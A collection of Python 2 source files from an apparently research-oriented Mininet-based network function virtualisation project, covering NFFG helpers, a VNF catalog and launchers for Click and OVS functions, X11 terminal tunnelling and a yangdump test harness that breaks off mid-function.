:type topo: :class:`NFFG`
:return: extracted NF name
:rtype: tuple
"""
bb, nf = get_bb_nf_from_path(path=path)
if bb not in topo or nf not in topo:
log.warning("Missing requested element: %s on %s from topo!" % (nf, bb))
return None, None
log.debug("Detected NF: %s on %s" % (nf, bb))
return bb, nf
def get_nfs_from_info (info):
"""
Return NF IDs defined in Info request.
:param info: Info object
:type info: :class:`Info`
:return: Nf Ids
:rtype: set
"""
nfs = set()
log.debug("Extract NFs from info request...")
for attr in (getattr(info, e) for e in info._sorted_children):
for element in attr:
if hasattr(element, "object"):
nf = get_nf_from_path(element.object.get_value())
if nf is not None:
nfs.add(nf)
else:
log.warning("Missing NF from element:\n%s" % element.object.xml())
else:
log.warning("Missing 'object' from element:\n%s" % element.xml())
return nfs
def strip_info_by_nfs (info, nfs):
"""
Remove Info element from given Info structure where the referred NF is not
in given nfs collection.
:param info: Info object
:type info: :class:`Info`
:param nfs: collection of NF IDs
:type nfs: list or set
:return: stripped Info object
:rtype: :class:`Info`
"""
info = info.yang_copy()
for attr in (getattr(info, e) for e in info._sorted_children):
deletable = []
for element in attr:
if hasattr(element, "object"):
nf_id = get_nf_from_path(element.object.get_value())
if nf_id not in nfs:
deletable.append(element)
for d in deletable:
attr.remove(d)
return info
def is_empty (virtualizer, skipped=('version', 'id')):
"""
Return True if the given Virtualizer object has no important child element.
:param virtualizer: virtualizer object
:type virtualizer: :class:`Virtualizer`
:param skipped: non-significant child name
:type skipped: tuple or list
:return: is empty
:rtype: bool
"""
next_child = virtualizer.get_next()
while next_child is not None:
# Skip version tag (old format) and id (new format)
if next_child.get_tag() not in skipped:
return False
else:
next_child = next_child.get_next()
return True
def is_identical (base, new):
"""
Return True if the base and new Virtualizer object is identical.
:param base: first Virtualizer object
:type base: :class:`Virtualizer`
:param new: first Virtualizer object
:type new: :class:`Virtualizer`
:return: is identical
:rtype: bool
"""
return is_empty(virtualizer=base.diff(new))
def _res_parser (raw_str):
try:
digits = filter(lambda c: c.isdigit() or c == '.', raw_str)
return ast.literal_eval(digits)
except SyntaxError:
pass
```
#### File: mininet/examples/vnftest-iminds.py
```python
from mininet.net import Mininet, MininetWithControlNet
from mininet.node import Controller, RemoteController
from mininet.cli import CLI
from mininet.log import setLogLevel, info
class InbandController( RemoteController ):
def checkListening( self ):
"Overridden to do nothing."
return
def netWithVNFs(netconf = False):
"Create an empty network and add nodes to it."
#ctl = InbandController( 'ctl', ip='192.168.123.1' )
#ctl = InbandController( 'ctl', ip='127.0.0.1' )
#net = MininetWithControlNet( )
net = MininetWithControlNet( controller=Controller, autoSetMacs=True )
#net = Mininet( controller=Controller )
info( '*** Adding controller\n' )
ctl = net.addController( 'c0' , controller=RemoteController )
#import pdb; pdb.set_trace();
info( '*** Adding hosts \n' )
h1 = net.addHost( 'h1')
h2 = net.addHost( 'h2')
info( '*** Adding VNFs \n' )
if netconf:
ee1 = net.addEE( 'ee1' )
ee1.setVNF(vnf_name='netconf')
ee2 = net.addEE( 'ee2' )
ee2.setVNF(vnf_name='netconf')
#[ exe1_sw, exe1_container ] = net.addManagedExe( 'exe1', nintf=5)
#exe1_container.cmd = netconf.makeNetConfCmd()
else:
ee1 = net.addEE( 'ee1',cpu=0.1)
#ee1.setVNF(vnf_name='fakeLoad', cpu='8', mem='5MB')
ee1.setVNF(vnf_name='simpleForwarder', device=ee1.name+'_eth1',name=ee1.name)
ee2 = net.addEE( 'ee2',cpu=0.1)
#example for NAT with two ports connected to internal hosts (private addresses) and one port connected to the Internet (public address)
device=[{'index':0,'name':'eth1','ip1':'1.0.0.1','ip2':'172.16.58.3'},{'index':1,'name':'eth2','ip1':'172.16.31.10','ip2':'172.16.31.10'}]
public={'index':2,'name':'eth2'}
ee2.setVNF(vnf_name='nat',device=device,public=public)
# ee2.setVNF(vnf_name='simpleObservationPoint', name=ee2.name)
#ee2.setVNF(vnf_name='fakeLoad', cpu='8', mem='5MB')
#ee2.setVNF(vnf_name='lookbusy',
# mem_util='5MB', cpu_util='8-20', cpu_mode='curve',
# cpu_curve_period='5m', cpu_curve_peak='2m' )
info( '*** Adding switches\n' )
s3 = net.addSwitch( 's3' )
s4 = net.addSwitch( 's4' )
info( '*** Creating links\n' )
net.addLink( h1, s3 )
net.addLink( h2, s4 )
net.addLink( s3, s4 )
if netconf:
net.addLink( exe1_sw, s3 )
else:
net.addLink( ee1, s3 )
net.addLink( ee2, s4 )
info( '*** Starting network\n' )
net.start()
info( '*** Running CLI\n' )
CLI( net )
info( '*** Stopping network' )
net.stop()
def add_VNF():
""" add VNFs to catalog (required parameters should be given) """
from mininet.vnfcatalogiminds import Catalog
#1. First single Click elements are added to the DB
Catalog().add_VNF(vnf_name='FromDevice',vnf_type='Click')
Catalog().add_VNF(vnf_name='ToDevice',vnf_type='Click')
Catalog().add_VNF(vnf_name='Queue',vnf_type='Click')
Catalog().add_VNF(vnf_name='Tee',vnf_type='Click')
#Catalog().add_VNF(vnf_name='Counter',vnf_type='Click',clickPath='/home/click',
# clickSource=['elements/standard/counter.cc','elements/standard/counter.cc'])
Catalog().add_VNF(vnf_name='Counter',vnf_type='Click')
Catalog().add_VNF(vnf_name='Classifier',vnf_type='Click')
Catalog().add_VNF(vnf_name='IPClassifier',vnf_type='Click')
Catalog().add_VNF(vnf_name='ICMPPingSource',vnf_type='Click')
Catalog().add_VNF(vnf_name='ARPQuerier',vnf_type='Click')
Catalog().add_VNF(vnf_name='AggregateIPFlows',vnf_type='Click')
Catalog().add_VNF(vnf_name='RFC2507Comp',vnf_type='Click')
Catalog().add_VNF(vnf_name='RFC2507Decomp',vnf_type='Click')
Catalog().add_VNF(vnf_name='IPAddRewriter',vnf_type='Click')
#2. Then the VNFs composed of several Click elements are added to the DB
Catalog().add_VNF(vnf_name='simpleForwarder',vnf_type='Click',description='receive on the data interface and loop back the packet')
Catalog().add_VNF(vnf_name='simpleObservationPoint',vnf_type='Click',description='A simple observation point in click')
Catalog().add_VNF(vnf_name='headerCompressor',vnf_type='Click',description='Compress IPv4/TCP headers as defined in RFC2507')
Catalog().add_VNF(vnf_name='headerDecompressor',vnf_type='Click',description='Decompress IPv4/TCP headers as defined in RFC2507')
Catalog().add_VNF(vnf_name='nat',vnf_type='Click',description='Provide the functionality of basic network address translator')
if __name__ == '__main__':
add_VNF()
setLogLevel( 'info' )
netWithVNFs()
```
#### File: mininet/mininet/clickhelper.py
```python
import sys
import copy
import subprocess
import atexit
from vnfcatalog import Catalog
class ClickHelper(object):
"""
Helper class for starting Click-based VNFs.
VNF info is read from VNF catalog.
"""
def __init__ (self):
self.vnf_type = None
self._parse_args()
self.catalog = Catalog()
self.click_proc = None
atexit.register(self.kill_click_proc)
def _parse_args (self):
"""
Loading command line args coming from netconfd to a dictionary.
Format: arg1=argval1 ar2=argval2 ...
"""
self.opts = dict(map(lambda x: x.split('='), sys.argv[1:]))
self.updateDevs()
def updateDevs (self):
"""
Update devs list based on opts (ex: dev_x=uny_y).
"""
devs = [(k, v) for k, v in self.opts.iteritems() if k.startswith('dev')]
devs = dict(devs)
devlist = []
for k in sorted(devs.keys()):
devlist.append(devs[k])
self.opts.update({'devs': devlist})
def setVNFType (self):
"""
Set vnf_type based on opts.
"""
try:
self.vnf_type = self.opts['type']
except KeyError:
self.vnf_type = None
return self.vnf_type
def getVNFType (self):
return self.vnf_type
def logVNFType (self):
if self.vnf_type:
# print self.vnf_type
with open('/tmp/vnftype.log', 'w') as f:
f.write(str(self.vnf_type))
f.close()
def initVNF (self):
"""
Initialize VNF, make command.
"""
self.setVNFType()
opts = copy.deepcopy(self.opts)
startCmd = self.catalog.make_cmd(opts['type'], name=opts['vnf_id'],
**self.opts)
startCmd = startCmd.replace('&', ' ')
self.startCmd = startCmd
def getVNFCmd (self):
return self.startCmd
def logVNFCmd (self):
if self.startCmd:
print self.startCmd
with open('/tmp/vnfcmd.log', 'w') as f:
f.write(str(self.startCmd))
f.close()
def startVNF (self):
"""
Execute previously assembled VNF command.
output: -1: fork failed, high error code: invalid argument
"""
print self.startCmd
# return os.system(self.startCmd)
# return subprocess.call(['sh', '-c', self.startCmd])
proc = subprocess.Popen(['sh', '-c', self.startCmd])
self.click_proc = proc
# blocking parent
output, error = proc.communicate()
exitcode = proc.wait()
return output, error, exitcode
def kill_click_proc (self):
if self.click_proc is None:
pass
else:
print "Kill click process, PID: %s" % self.click_proc.pid
self.click_proc.kill()
if __name__ == "__main__":
ch = ClickHelper()
ch.initVNF()
ch.logVNFCmd()
(output, error, exitcode) = ch.startVNF()
print output
print error
print exitcode
```
#### File: mininet/mininet/term.py
```python
from os import environ
from mininet.log import error
from mininet.util import quietRun, errRun
def tunnelX11( node, display=None):
"""Create an X11 tunnel from node:6000 to the root host
display: display on root host (optional)
returns: node $DISPLAY, Popen object for tunnel"""
if display is None and 'DISPLAY' in environ:
display = environ[ 'DISPLAY' ]
if display is None:
error( "Error: Cannot connect to display\n" )
return None, None
host, screen = display.split( ':' )
# Unix sockets should work
if not host or host == 'unix':
# GDM3 doesn't put credentials in .Xauthority,
# so allow root to just connect
quietRun( 'xhost +si:localuser:root' )
return display, None
else:
# Create a tunnel for the TCP connection
port = 6000 + int( float( screen ) )
connection = r'TCP\:%s\:%s' % ( host, port )
cmd = [ "socat", "TCP-LISTEN:%d,fork,reuseaddr" % port,
"EXEC:'mnexec -a 1 socat STDIO %s'" % connection ]
return 'localhost:' + screen, node.popen( cmd )
def makeTerm( node, title='Node', term='xterm', display=None, cmd='bash'):
"""Create an X11 tunnel to the node and start up a terminal.
node: Node object
title: base title
term: 'xterm' or 'gterm'
returns: two Popen objects, tunnel and terminal"""
title = '"%s: %s"' % (title, node.name)
if not node.inNamespace:
title += ' (root)'
cmds = {
'xterm': [ 'xterm', '-title', title, '-display' ],
'gterm': [ 'gnome-terminal', '--title', title, '--display' ]
}
if term not in cmds:
error( 'invalid terminal type: %s' % term )
return
display, tunnel = tunnelX11( node, display )
if display is None:
return []
term = node.popen(cmds[term] +
[display, '-e', 'env TERM=ansi %s' % cmd])
return [ tunnel, term ] if tunnel else [ term ]
def runX11( node, cmd ):
"Run an X11 client on a node"
_display, tunnel = tunnelX11( node )
if _display is None:
return []
popen = node.popen( cmd )
return [ tunnel, popen ]
def cleanUpScreens():
"Remove moldy socat X11 tunnels."
errRun( "pkill -9 -f mnexec.*socat" )
def makeTerms( nodes, title='Node', term='xterm' ):
"""Create terminals.
nodes: list of Node objects
title: base title for each
returns: list of created tunnel/terminal processes"""
terms = []
for node in nodes:
terms += makeTerm( node, title, term )
return terms
```
#### File: mininet/mininet/vnfcatalog.py
```python
import copy
import inspect
import os
import sqlite3
from log import error
# Singleton: not used currently
class Singleton(type):
_instances = {}
def __call__ (cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
class Catalog(object):
"""
Catalog of VNFs.
"""
__shared_state = {}
# __metaclass__ = Singleton
def __init__ (self, filename=None):
self.__dict__ = self.__shared_state
if len(Catalog.__shared_state) == 0:
self.db = {}
self.set_filename(filename)
self.load()
def set_filename (self, filename=None):
if filename:
self.filename = filename
return
this_file = os.path.abspath(inspect.getfile(inspect.currentframe()))
dirname = os.path.dirname(this_file)
self.filename = os.path.join(dirname, 'vnfcatalogue.db')
return
def load (self, filename=None):
if not filename:
filename = self.filename
self.conn = sqlite3.connect(filename)
cur = self.conn.cursor()
cur.execute('''create table if not exists VNFs (name text, type text,
description
text, command text, readHdr text, writeHdr text, dependency text,
icon text, builder_class text, hidden text)''')
self.db = {}
data = self.query_db("SELECT * FROM VNFs")
for metadata in data:
try:
self.db[metadata['name']] = metadata
except KeyError:
error('invalid vnf data: %s' % metadata)
def get_db (self):
"""
Return the list of metadata for VNFs available to launch.
"""
# don't let callers mess with our database
return copy.deepcopy(self.db)
def make_cmd (self, vnf_name, **kw):
"""
Return a command line that starts 'vnf_name'.
"""
try:
metadata = copy.deepcopy(self.db[vnf_name])
vnf_type = metadata['type']
cls_name = 'Vnf' + vnf_type
cls = globals()[cls_name]
except KeyError:
raise RuntimeError('VNF not found (%s)' % vnf_name)
metadata.update(kw)
c = cls()
return c.make_cmd(**metadata)
def query_db (self, sql):
data = []
try:
cur = self.conn.cursor()
cur.execute(sql)
column_names = [x[0] for x in cur.description]
while True:
row = cur.fetchone()
if row is None:
break
dictionary = dict(zip(column_names, row))
data.append(dictionary)
except KeyError:
error('Cannot query the Data Base')
return data
def add_VNF (self, **kwargs):
"""
Interface to add new VNF to the Catalog DB.
"""
vnf_name = kwargs.get('vnf_name', '')
vnf_type = kwargs.get('vnf_type', '')
if self.db.get(vnf_name, ''):
error('VNF %s exists \n' % vnf_name)
return
cls_name = 'Vnf' + vnf_type
cls = globals()[cls_name]
c = cls()
return c.add_VNF(self, **kwargs)
def remove_VNF (self, **kwargs):
"""
Interface to remove VNF from Catalog DB.
"""
vnf_name = kwargs.get('vnf_name', '')
# First check the dependencies.
data = self.query_db("SELECT * FROM VNFs")
for metadata in data:
dependency = eval(metadata['dependency'])
for element in dependency:
if element == vnf_name:
error("VNF cannot be removed. There is a dependency")
return
del self.db[vnf_name]
cur = self.conn.cursor()
name = (vnf_name,)
cur.execute('DELETE FROM VNFs WHERE name = ?', name)
self.conn.commit()
def get_VNF (self, vnf_name):
"""
Interface to get attributes of VNF from Catalog DB given by name.
"""
data = []
name = (vnf_name,)
sql = "SELECT * FROM VNFs WHERE name = ?"
try:
cur = self.conn.cursor()
cur.execute(sql, name)
column_names = [x[0] for x in cur.description]
while True:
row = cur.fetchone()
if row is None:
break
dictionary = dict(zip(column_names, row))
data.append(dictionary)
except KeyError:
error('Cannot query the Data Base')
return data
class VnfClick(object):
"""
Helper object for convenient launching of click-based vnfs.
"""
# __metaclass__ = Singleton
def __init__ (self):
pass
def make_cmd (self, **kwargs):
self.clickCmd = kwargs.get('clickCmd', '')
self.clickPath = kwargs.get('clickPath', '')
self.hotConfig = kwargs.get('hotConfig', True)
self.controlSocket = kwargs.get('controlSocket', True)
self.csPort = kwargs.get('csPort', 8001)
self.vnfName = kwargs.get('name', '')
# self.clickExp = kwargs.get( 'command', '' )
self.clickExp = self.instantiate_VNF(**kwargs)
self.clickFile = kwargs.get('clickFile', '')
self.output = kwargs.get('output', True)
# self.mac = kwargs.get( 'mac', '' )
if self.clickCmd:
return self.clickCmd + ' &'
if self.clickPath:
self.clickCmd = self.clickPath + '/click'
else:
self.clickCmd = 'click'
if self.hotConfig:
self.clickCmd += ' -R'
if self.controlSocket:
self.clickCmd = self.clickCmd + ' -p' + str(self.csPort)
# if self.vnfName:
# self.clickCmd = self.clickCmd + ' VNFNAME=' + self.vnfName
# if self.mac:
# self.clickExp = self.clickExp.replace('\$MAC', self.mac)
# self.clickCmd = self.clickCmd + ' MAC=' + self.mac
if self.clickFile:
self.clickCmd = self.clickCmd + ' -f ' + self.clickFile
else:
# self.clickExp = self.clickExp.replace('\$VNFNAME', self.vnfName)
self.clickCmd = self.clickCmd + ' -e "' + self.clickExp + '"'
if self.output:
return self.clickCmd + ' 2> ' + '/tmp/' + self.vnfName + '-' + str(
self.csPort) + '.log &'
else:
return self.clickCmd + ' &'
def add_VNF (self, catalog, **kwargs):
this_file = os.path.abspath(inspect.getfile(inspect.currentframe()))
dirname = os.path.dirname(this_file)
self.vnfName = kwargs.get('vnf_name', '')
self.vnfType = kwargs.get('vnf_type', '')
self.clickTempPath = kwargs.get('clickTempPath',
dirname + '/templates/' + self.vnfName +
'.jinja2')
self.clickPath = kwargs.get('clickPath', '')
self.clickSource = kwargs.get('clickSource', '')
self.vnfDescription = kwargs.get('description', '')
self.icon = kwargs.get('icon', '')
self.builder_class = kwargs.get('builder_class', 'VNFClickBuilder')
self.hidden = kwargs.get('hidden', 'False')
# 1. First check if the source can be compiled
if self.clickSource:
if not self.compile(**kwargs):
return False
# 2. Check the existence of the required VNFs/Click elements
dependency = []
if os.path.exists(self.clickTempPath):
with open(self.clickTempPath) as template:
# It is assumed that elements are defined in the click scripts using
# "::"
for line in template:
if '::' in line:
element = line.split('::')[-1].split('(')[0].replace(' ', '')
name = (str(element),)
cur = catalog.conn.cursor()
cur.execute('SELECT * FROM VNFs WHERE name = ?', name)
VNF = cur.fetchone()
if VNF:
dependency.append(str(element))
else:
error('The new VNF is dependent on non-existing VNF:%s' % element)
return False
template = open(self.clickTempPath, 'r').read()
else:
template = ''
# 3. Extract the Click handlers from the source files (The handlers
# are used for configuration of VNFs)
read_handlers = {}
read = []
write_handlers = {}
write = []
for src in self.clickSource:
if '.cc' in src:
with open(self.clickPath + '/' + src) as source:
for line in source:
if 'add_read_handler' in line:
hdlr = line.split('"')[1]
if hdlr not in read:
read.append(hdlr)
if 'add_write_handler' in line:
hdlr = line.split('"')[1]
if hdlr not in write:
write.append(hdlr)
if read:
read_handlers[self.vnfName] = read
if write:
write_handlers[self.vnfName] = write
# Add the handlers of other elements used in the Click scripts of the new
# VNF
if dependency:
for element in dependency:
name = (element,)
cur = catalog.conn.cursor()
cur.execute('SELECT * FROM VNFs WHERE name = ?', name)
VNF = cur.fetchone()
read = eval(VNF[4]).get(element, '')
write = eval(VNF[5]).get(element, '')
if read:
read_handlers[element] = read
if write:
write_handlers[element] = write
# ToDo: the type of the parameters for the handlers should be
# determined (now only the handlers names are extracted from the
# source files)
# 4. Add to the DataBase
cur = catalog.conn.cursor()
sql = (self.vnfName, self.vnfType, self.vnfDescription, str(template),
repr(read_handlers), repr(write_handlers), repr(dependency),
self.icon, self.builder_class, self.hidden)
cur.execute('INSERT INTO VNFs VALUES (?,?,?,?,?,?,?,?,?,?)', sql)
catalog.conn.commit()
def instantiate_VNF (self, **kwargs):
"""
Instantiate the VNF (Click script) with the given parameters.
"""
from jinja2 import Template
self.clickExp = kwargs.get('command', '')
# all the required parameters for instantiation of the Click scripts
# should be set here
self.vnfDevs = kwargs.get('devs', [])
if self.vnfDevs == []:
# static use-case, single device name is derived from vnf name
self.vnfDevs = [self.vnfName + '-eth1']
self.dev = kwargs.get('device', '')
self.method = kwargs.get('method', 'PCAP')
self.daddress = kwargs.get('daddress', '10.0.0.5')
self.interval = kwargs.get('interval', '1')
self.limit = kwargs.get('limit', '-1')
self.gw = kwargs.get('gw', self.vnfDevs[0] + ':gw')
self.mac = kwargs.get('mac', '')
self.public = kwargs.get('public', '')
templateVars = {
'DEV': self.dev, 'METHOD': self.method,
'DADDR': self.daddress, 'INTERVAL': self.interval,
'LIMIT': self.limit, 'GW': self.gw, 'MAC': self.mac,
'public': self.public
}
for i, dev in enumerate(self.vnfDevs):
templ = 'VNFDEV' + str(i)
templateVars[templ] = dev
template = Template(self.clickExp)
return template.render(templateVars)
# return template.render(DEV=self.dev,METHOD=self.method,
# DADDR=self.daddress,
# INTERVAL=self.interval,LIMIT=self.limit,GW=self.gw,
# MAC=self.mac,public=self.public)
def compile (self, **kwargs):
"""
Given the source code of a new Click element, the code is compiled.
"""
# should be checked!, Currently user level is considered
# First check if the source files exist
for src in self.clickSource:
if not os.path.exists(self.clickPath + '/' + src):
error('source file does not exist: %s' % src)
return False
os.system(
'cd ' + self.clickPath + '; make clean; ./configure; make elemlist; make')
if not os.path.exists(self.clickPath + '/userlevel/click'):
error('The source code can not be compiled')
return False
else:
print "Successful compile!"
return True
class VnfLookBusy(object):
"""
Helper object for launching complex LookBusy commands.
"""
def make_cmd (self, **kw):
"Assemble a complex lookbusy commandline."
args = ['verbose', 'quiet', 'cpu-util', 'ncpus', 'cpu-mode',
'cpu-curve-period', 'cpu-curve-peak', 'utc', 'mem-util',
'mem-sleep', 'disk-util', 'disk-sleep', 'disk-block-size',
'disk-path']
cmd = 'lookbusy'
for k, v in kw.iteritems():
arg = k.replace('_', '-')
if arg in args:
cmd += ' --%s %s' % (arg, v)
else:
error('lookbusy: unknown argument (%s)\n' % k)
return cmd + ' &'
class VnfFakeLoad(object):
"""
Helper object for convenient launching of LookBusy.
"""
def make_cmd (self, cpu='', mem='', **kw):
"""Generate load for testing VNF load balancers.
:param kw:
:param mem:
:param cpu:
"""
cmd = 'lookbusy'
if cpu:
cmd = cmd + ' -c ' + cpu
if mem:
cmd = cmd + ' -m ' + mem
return cmd + ' &'
class VnfNetConf(object):
"""
Helper object for convenient launching of NetConf-based managers.
"""
__shared_state = {'start_port': 830}
def __init__ (self, start_port=None):
self.__dict__ = self.__shared_state
if start_port:
self.start_port = start_port
def make_cmd (self, **kwargs):
close = kwargs.get('close', True)
cmd = 'netconfd --module=starter --log=/home/unify/mylog'
cmd += ' --log-level=debug4 --superuser=unify'
cmd += ' --port=' + str(self.start_port)
self.start_port += 1
if close:
print(cmd + ' &')
return cmd + ' &'
else:
return cmd
class VnfOVS(object):
"""
Helper object for convenient launching of OVS-based vnfs.
"""
# __metaclass__ = Singleton
def __init__ (self):
pass
def make_cmd (self, **kwargs):
self.vnfName = kwargs.get('name', '')
self.OVSExp = self.instantiate_VNF(**kwargs)
self.cmd = "sudo /bin/sh -c "
self.cmd = self.cmd + "'" + self.OVSExp + "'"
return self.cmd + ' &'
def add_VNF (self, catalog, **kwargs):
this_file = os.path.abspath(inspect.getfile(inspect.currentframe()))
dirname = os.path.dirname(this_file)
self.vnfName = kwargs.get('vnf_name', '')
self.vnfType = kwargs.get('vnf_type', '')
self.read_handlers = []
self.write_handlers = []
self.dependency = []
self.TempPath = kwargs.get('TempPath',
dirname + '/templates/' + self.vnfName +
'.jinja2')
self.vnfDescription = kwargs.get('description', '')
self.icon = kwargs.get('icon', '')
self.builder_class = kwargs.get('builder_class', '')
self.hidden = kwargs.get('hidden', '')
if os.path.exists(self.TempPath):
template = open(self.TempPath, 'r').read()
else:
template = ''
# Add to the DataBase
cur = catalog.conn.cursor()
sql = (self.vnfName, self.vnfType, self.vnfDescription, str(template),
repr(self.read_handlers), repr(self.write_handlers),
repr(self.dependency),
self.icon, self.builder_class, self.hidden)
cur.execute('INSERT INTO VNFs VALUES (?,?,?,?,?,?,?,?,?,?)', sql)
catalog.conn.commit()
def instantiate_VNF (self, **kwargs):
"""
Instantiate the VNF (OVS script) with the given parameters.
"""
from jinja2 import Template
self.OVSExp = kwargs.get('command', '')
# all the required parameters for instantiation of the OVS scripts
# should be set here
self.sw = kwargs.get('swName', 's1')
self.ctrlIP = kwargs.get('ctrlIP', '10.0.10.100')
self.ctrlPort = kwargs.get('ctrlPort', '6633')
self.ports = kwargs.get('ports', [])
if not self.ports:
# static use-case, single device name is derived from vnf name
self.ports = [{'name': self.vnfName + '-eth1'}]
self.vnfDevs = kwargs.get('devs', [])
if not self.vnfDevs:
# static use-case, single device name is derived from vnf name
self.ports = [{'name': self.vnfName + '-eth1'}]
else:
self.ports = []
for dev in self.vnfDevs:
self.ports.append({'name': dev})
template = Template(self.OVSExp)
return template.render(sw=self.sw, ctrlIP=self.ctrlIP,
ctrlPort=self.ctrlPort,
ports=self.ports)
```
#### File: mininet/mininet/vnfcatalog-reset.py
```python
from vnfcatalog import Catalog
def del_VNFs (vnf_list):
for vnf in vnf_list:
if Catalog().get_VNF(vnf_name=vnf):
Catalog().remove_VNF(vnf_name=vnf)
def add_VNFs ():
""" add VNFs to catalog (required parameters should be given) """
# 1. First single Click elements are added to the DB
Catalog().add_VNF(vnf_name='FromDevice', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='ToDevice', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='Queue', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='Tee', vnf_type='Click', hidden='True')
# Catalog().add_VNF(vnf_name='Counter',vnf_type='Click',
# clickPath='/home/click',
# clickSource=['elements/standard/counter.cc',
# 'elements/standard/counter.cc'])
Catalog().add_VNF(vnf_name='Counter', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='Classifier', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='IPClassifier', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='ICMPPingSource', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='ARPQuerier', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='AggregateIPFlows', vnf_type='Click',
hidden='True')
Catalog().add_VNF(vnf_name='RFC2507Comp', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='RFC2507Decomp', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='IPAddRewriter', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='TCPOptimizer', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='MarkIPHeader', vnf_type='Click', hidden='True')
# 2. Then the VNFs composed of several Click elements are added to the DB
Catalog().add_VNF(vnf_name='simpleForwarder',
vnf_type='Click',
description='receive on the data interface and loop back '
'the packet',
icon='forward.png')
Catalog().add_VNF(vnf_name='simpleObservationPoint',
vnf_type='Click',
description='A simple observation point in click',
icon='search.png')
Catalog().add_VNF(vnf_name='headerCompressor',
vnf_type='Click',
description='Compress IPv4/TCP headers as defined in '
'RFC2507',
icon='decompress_small.png')
Catalog().add_VNF(vnf_name='headerDecompressor',
vnf_type='Click',
description='Decompress IPv4/TCP headers as defined in '
'RFC2507',
icon='compress2_small.png')
Catalog().add_VNF(vnf_name='nat',
vnf_type='Click',
hidden='True',
description='Provide the functionality of basic network '
'address translator')
Catalog().add_VNF(vnf_name='tcpRWINOptimizer',
vnf_type='Click',
description='TCP Optimizer',
icon='forward.png')
Catalog().add_VNF(vnf_name='ovs',
vnf_type='OVS',
description='OVS switch')
print Catalog().get_db()
if __name__ == '__main__':
del_VNFs(['simpleForwarder',
'simpleObservationPoint',
'headerCompressor',
'headerDecompressor',
'tcpRWINOptimizer',
'nat'])
add_VNFs()
```
#### File: test/ydump-test/ydump-test.py
```python
import sys
import os
import commands
import re
# ----------------------------------------------------------------------------|
YumaRootDir = "../../../netconf"
YumaModuleDir = YumaRootDir + "/modules"
YumaModPath = "YUMA_MODPATH=" + YumaModuleDir
YangdumpExe = YumaRootDir + "/target/bin/yangdump"
LdLibraryPath = "LD_LIBRARY_PATH=" + YumaRootDir + "/target/lib"
YangEnvSettings = LdLibraryPath + " " + YumaModPath + " "
TestOutputDir = "./yangdump-op"
# ----------------------------------------------------------------------------|
def InitialiseOutputDir():
"""Create / Clean the test output directory"""
commands.getoutput( "mkdir -p " + TestOutputDir )
commands.getoutput( "rm -rf " + TestOutputDir+"/*" )
# ----------------------------------------------------------------------------|
def RunYangDump( fmt ):
"""Run Yangdump over the yang files generating output in the
requested format"""
command = ( YangEnvSettings + YangdumpExe + " "
+ "subtree=" + YumaModuleDir+ "/ietf "
+ "subtree=" + YumaModuleDir+ "/netconfcentral "
+ "subtree=" + YumaModuleDir+ "/yang "
+ "subtree=" + YumaModuleDir+ "/test/pass "
+ "output=" + TestOutputDir + " "
+ "format="+fmt + " "
+ "defnames=true "
+ "log=" + TestOutputDir+"/test-"+fmt+".log "
+ "log-level=debug" )
print "Running command: %s" % command
commands.getoutput( command )
# ----------------------------------------------------------------------------|
def CountOccurrences ( searchText, data, ignoreCase = True ):
"""Crude count of the number of occurrences of searchText in data"""
if ignoreCase:
res = [ m.start() for m in re.finditer( searchText, data, re.IGNORECASE) ]
else:
res = [ m.start() for m in re.finditer( searchText, data ) ]
return len( res )
# ----------------------------------------------------------------------------|
def SummariseErrorsAndWarnings( data ):
"""Search for the line '*** # Errors, # Warnings' in the output file and
extract the count of errors and warnings reported"""
regex = re.compile( "\*\*\* (\\d+) Errors, (\\d+) Warnings" )
errors = 0
warnings = 0
for m in re.findall( regex, data ):
errors += int( m[0] )
warnings += int( m[1] )
return (errors, warnings)
# ----------------------------------------------------------------------------|
def AnalyseOutput( fmt ):
"""Analyse the output log file for the specified yangdump format"""
filename = TestOutputDir + "/test-" + fmt + ".log"
print "Analysing Results From %s" % filename
f = open( filename, "r" )
data = f.read();
# get the number of errors and warnings
errors, warnings = SummariseErrorsAndWarnings( data )
# get the number of Segmentation Violations
# Note this is a based on the original makefile script, which
# simply greps for 'Segmentation' - it is assumed that any
# occurrences indicates a Segmentation Fault
segmentCount = CountOccurrences( "Segmentation", data )
# get the number of occurrences of 'internal'
internalCount = CountOccurrences( "internal", data )
return ( errors, warnings, segmentCount, internalCount )
# ----------------------------------------------------------------------------|
def TestFormat( fmt ):
"""Test the specified format and collate the results"""
RunYangDump( fmt )
return AnalyseOutput( fmt )
# ----------------------------------------------------------------------------|
def TestYang():
results = {}
for fmt in [ "yin", "yang", "xsd", "sqldb", "html", "h", "c" ]:
result = TestFormat( fmt )
results[ fmt ] = result
return results
# ----------------------------------------------------------------------------|
def DisplayResults( results ):
colWid = 15
tabWid = 80
print "\n"
print "="*tabWid
print " The Results of running yangdump are summarised in the table below."
print "-"*tabWid
print ( " %s %s %s %s %s" % ( "Format".ljust(colWid),
"Errors".center(colWid),
"Warnings".center(colWid),
"Seg-Faults".center(colWid),
"Internal".center(colWid) ) )
totalErrors = 0
totalInternal = 0
totalSegFaults = 0
warningHighWaterMark = 89
warningHighWaterMarkExceeded = False
print "-"*tabWid
for k in sorted( results.keys() ):
res = results[k]
print ( " %s %s %s %s %s" % ( repr(k).ljust(colWid),
repr(res[0]).center(colWid),
repr(res[1]).center(colWid),
repr(res[2]).center(colWid),
repr(res[3]).center(colWid) ) )
totalErrors += res[0]
totalSegFaults += res[2]
totalInternal += res[3]
if res[1] > warningHighWaterMark:
warningHighWaterMarkExceeded = True
print "-"*tabWid
print " Note: Many yang files currently emit warnings."
print "-"*tabWid
errorOp = False
if totalErrors>0:
print "\033[31;1m Test Failed: There were %d errors \033[39;0m" % totalErrors
errorOp = True
if totalInternal>0:
print "\033[31;1m Test Failed: There were %d Segment Faults \033[39;0m" % totalErrors
